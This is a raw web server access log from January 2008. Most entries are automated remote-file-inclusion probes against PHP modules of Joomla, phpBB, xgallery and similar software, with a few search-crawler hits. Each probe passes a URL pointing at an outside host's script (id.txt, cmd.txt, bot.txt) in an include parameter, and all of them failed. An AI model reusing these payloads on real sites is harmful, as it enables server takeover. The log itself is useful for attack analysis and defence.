74.52.9.218 - - [22/Jan/2008:05:54:21 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.220.207.135 - - [22/Jan/2008:05:54:59 -0800] "GET /logs/access_071205.log//?mosConfig_absolute_path=http://www.geocities.com/chandramission/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:05:57:02 -0800] "GET /logs/access.log//includes/functions_portal.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:05:57:03 -0800] "GET //includes/functions_portal.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:05:57:03 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:05:58:53 -0800] "GET /logs/access_071224.log//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:05:58:54 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:05:58:54 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.121 - - [22/Jan/2008:06:00:25 -0800] "GET /megumi/earrings/?D=D HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
38.102.88.143 - - [22/Jan/2008:06:01:14 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.81 - - [22/Jan/2008:06:01:36 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:06:02:05 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:06:02:05 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:06:02:06 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.164 - - [22/Jan/2008:06:02:18 -0800] "GET /minamijewelry/html/schedule.html HTTP/1.0" 200 12759 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.52.143.15 - - [22/Jan/2008:06:02:32 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
38.102.88.143 - - [22/Jan/2008:06:03:48 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [22/Jan/2008:06:03:48 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.10.8 - - [22/Jan/2008:06:05:14 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.10.8 - - [22/Jan/2008:06:05:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.88.242 - - [22/Jan/2008:06:05:45 -0800] "GET ///amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:06:06 -0800] "GET /logs/access.log//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:06:06 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:06:06 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:06:06:19 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [22/Jan/2008:06:06:36 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:06:41 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:06:42 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:06:42 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:06:06:51 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:06:06:51 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:06:06:51 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:06:06:51 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:06:08:23 -0800] "GET /index.php?option=com_comprofiler&task=usersList&Itemid=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:06:08:26 -0800] "GET /logs/index.php?option=com_comprofiler&task=usersList&Itemid=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
64.37.66.135 - - [22/Jan/2008:06:08:36 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.139.97 - - [22/Jan/2008:06:12:42 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:12:45 -0800] "GET /logs/access_071224.log//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.97 - - [22/Jan/2008:06:13:19 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:13:33 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.219.225 - - [22/Jan/2008:06:17:35 -0800] "GET /index.php?site=http://user.personal.fi/private/kaisaarto/Joomla/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
211.115.219.225 - - [22/Jan/2008:06:17:35 -0800] "GET /logs/index.php?site=http://user.personal.fi/private/kaisaarto/Joomla/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:06:18:41 -0800] "GET /logs/access_071224.log//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:06:18:42 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:06:18:42 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:19:28 -0800] "GET /logs/access_071229.log/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:19:29 -0800] "GET /nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:19:29 -0800] "GET /logs/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:22:28 -0800] "GET /logs/access_071222.log/database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:22:28 -0800] "GET /database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:22:29 -0800] "GET /logs/database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.151.232.133 - - [22/Jan/2008:06:23:46 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carruga.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.232.133 - - [22/Jan/2008:06:23:46 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carruga.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.232.133 - - [22/Jan/2008:06:23:47 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carruga.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:06:23:47 -0800] "GET /logs/access_071205.log//?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.68.153.178 - - [22/Jan/2008:06:25:27 -0800] "GET /bikes/dteel/Mining_Pick.jpg HTTP/1.1" 200 23376 "http://www.st-owners.com/forums/showthread.php?t=34378" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
70.86.88.242 - - [22/Jan/2008:06:25:49 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.88.242 - - [22/Jan/2008:06:25:49 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.88.242 - - [22/Jan/2008:06:25:49 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.139.233 - - [22/Jan/2008:06:25:56 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://geocities.com/huloduhacker/injank.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:06:30:20 -0800] "GET /logs/access.log//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:06:30:20 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:06:30:21 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:06:30:21 -0800] "GET /logs/access_071224.log//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
207.58.139.233 - - [22/Jan/2008:06:31:06 -0800] "GET /logs/access_071224.log/modules/Neos_Chronos/header.php?base_folder=http://geocities.com/huloduhacker/injank.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.139.233 - - [22/Jan/2008:06:31:07 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://geocities.com/huloduhacker/injank.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:06:31:15 -0800] "GET /logs/access_071230.log/modules/TotalCalendar/about.php?inc_dir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:06:31:15 -0800] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:06:31:25 -0800] "GET /logs/access_071225.log/modules/TotalCalendar/about.php?inc_dir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.61.135.106 - - [22/Jan/2008:06:32:37 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:33:07 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:33:08 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:33:08 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.88.242 - - [22/Jan/2008:06:34:20 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:06:35:26 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:35:26 -0800] "GET /logs/access.log/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:35:27 -0800] "GET /nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:35:27 -0800] "GET /logs/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.159 - - [22/Jan/2008:06:36:47 -0800] "GET /plans/?M=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:38:16 -0800] "GET /logs/access_071224.log/modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:38:17 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:38:19 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:06:39:18 -0800] "GET /logs/access.log//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:06:39:19 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:06:39:23 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:40:16 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:40:16 -0800] "GET /config.php?path_to_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:40:17 -0800] "GET /logs/config.php?path_to_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:06:40:27 -0800] "GET /logs/access_071228.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:06:40:29 -0800] "GET /logs/access_071228.log/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:40:51 -0800] "GET /logs/access_080101.log/config.php?path_to_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:42:15 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:42:15 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:42:16 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [22/Jan/2008:06:43:57 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:06:47:12 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:06:47:12 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:06:47:13 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:06:47:39 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:06:47:40 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:06:47:40 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.99.64 - - [22/Jan/2008:06:48:42 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.230 - - [22/Jan/2008:06:49:41 -0800] "GET /bikes/?N=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:06:51:07 -0800] "GET /logs/access_071224.log//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.193.50 - - [22/Jan/2008:06:52:38 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.84.193.50 - - [22/Jan/2008:06:52:38 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.30.216.107 - - [22/Jan/2008:06:53:26 -0800] "GET /logs/access.log HTTP/1.0" 200 98527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:06:56:35 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:06:56:37 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:06:56:38 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:06:56:40 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
